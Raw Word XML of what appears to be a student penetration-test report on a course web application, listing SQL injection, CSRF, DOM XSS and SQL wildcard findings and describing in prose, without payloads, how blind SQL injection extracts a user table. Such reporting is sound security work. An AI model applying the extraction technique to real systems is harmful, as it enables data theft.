              <w:t>Section 3 – Cross-Site Scripting Exploitation Walkthrough</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488358 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3802086F" w14:textId="0650CF86" w:rsidR="00FC2B1D" w:rsidRDefault="0046559C">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9019"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="21"/>
              <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc71488359" w:history="1">
            <w:r w:rsidR="00FC2B1D" w:rsidRPr="009076AE">
              <w:rPr>
                <w:rStyle w:val="a9"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Section 4 – SQL Wildcard Exploitation</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc71488359 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00545D13">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r w:rsidR="00FC2B1D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6B049A0F" w14:textId="410A4A8A" w:rsidR="00B97362" w:rsidRDefault="006750D3">
          <w:pPr>
            <w:tabs>
              <w:tab w:val="right" w:pos="9025"/>
            </w:tabs>
            <w:spacing w:before="200" w:after="80" w:line="240" w:lineRule="auto"/>
            <w:rPr>
              <w:color w:val="000000"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="2A972E5B" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="04DA2B1C" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B480AD" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc71488320"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Summary of Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="0F5AE819" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a5"/>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500"/>
        <w:gridCol w:w="6150"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B97362" w14:paraId="3C6F7C19" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D86CDAA" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="278CD0A5" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="602D1445" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="1CACDB88" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1BF8AD8A" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E265489" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Finding 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0F85D79A" w14:textId="14CB088D" w:rsidR="00B97362" w:rsidRDefault="0010227E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>SQL injection vulnerability present in find user functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="5A4536EC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2E6EA6CE" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="660201BA" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Finding 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7609350D" w14:textId="15C0D396" w:rsidR="00B97362" w:rsidRDefault="004E04E4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cross-site request forgery vulnerability present in user profile page, validate website functionality </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="63460526" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C58D7AC" w14:textId="77B92288" w:rsidR="00B97362" w:rsidRDefault="004E04E4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6756B673" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Finding 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="04A2593C" w14:textId="7D287FEE" w:rsidR="00B97362" w:rsidRDefault="00FF7098">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>DOM</w:t>
            </w:r>
            <w:r w:rsidR="004E04E4">
              <w:t xml:space="preserve"> cross-site scripting vulnerability present in anonymous question functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="7158F94F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1365" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="10405F0B" w14:textId="3C640358" w:rsidR="00B97362" w:rsidRDefault="004E04E4">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1500" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="108AF37A" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>Finding 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6150" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3DAB57ED" w14:textId="1EF37B5E" w:rsidR="00B97362" w:rsidRDefault="00053557">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>SQL wildcard vulnerability present in API documentation functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09B98AAF" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="454D1903" w14:textId="49825448" w:rsidR="00B97362" w:rsidRDefault="006750D3" w:rsidP="007D73B9">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc71488321"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="39C559FD" w14:textId="6D88F445" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc71488322"/>
      <w:r>
        <w:t xml:space="preserve">Finding 1 </w:t>
      </w:r>
      <w:r w:rsidR="0010227E">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0010227E">
        <w:t>SQL Injection in Find User Functionality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="631A06D7" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>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B97362" w14:paraId="7B06D709" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78854E54" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="4" w:name="_Toc71488323"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="4"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2D1ADFC2" w14:textId="1A5764B0" w:rsidR="00B97362" w:rsidRPr="00D85BBC" w:rsidRDefault="0070389C">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00D85BBC">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">n Find User page, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>an authenticated user can</w:t>
            </w:r>
            <w:r w:rsidR="001A2733">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> input a string, to search whether a user’s name in the database is same as this string, return true or false. But with SQL injection and wildcard techniques, an attacker can figure out all data saved in this user table.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="077A6E3B" w14:textId="77777777" w:rsidTr="00FF7098">
        <w:trPr>
          <w:trHeight w:val="2052"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="50747200" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="_Toc71488324"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1E463C0D" w14:textId="57271F6D" w:rsidR="00B97362" w:rsidRDefault="001A2733">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>This vulnerability arises when an authenticated user input in the search bar in the web page(</w:t>
            </w:r>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/find.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">). </w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve">Because the response only includes </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009F52D1">
              <w:t>true,false</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve">, and hacker </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009F52D1">
              <w:t>dected</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009F52D1">
              <w:t>, the attacker first</w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t>ly</w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve"> needs to try </w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t xml:space="preserve">out </w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve">how to avoid hacker </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="009F52D1">
              <w:t>dected</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve">, and </w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t xml:space="preserve">then </w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve">get the content saved in this table by guessing characters one by one, and determine whether the guess is correct </w:t>
            </w:r>
            <w:r w:rsidR="0088572A">
              <w:t>according to</w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:t xml:space="preserve"> the response from the server. </w:t>
            </w:r>
            <w:r w:rsidR="00053557">
              <w:t xml:space="preserve">For a detailed walkthrough, see </w:t>
            </w:r>
            <w:hyperlink w:anchor="A2_s1" w:history="1">
              <w:r w:rsidR="00053557" w:rsidRPr="00467058">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix2, Section1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00467058">
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B97362" w14:paraId="7A05B3D9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7EE3870D" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_Toc71488325"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="79C0F1B5" w14:textId="035CB1AA" w:rsidR="00B97362" w:rsidRDefault="00696EC2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Major: </w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>By multiple attempts, a</w:t>
            </w:r>
            <w:r w:rsidR="006750D3" w:rsidRPr="009F52D1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">n attacker could </w:t>
            </w:r>
            <w:r w:rsidR="009F52D1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">gain all data saved in this user table which the user find page </w:t>
            </w:r>
            <w:r w:rsidR="003647E1">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
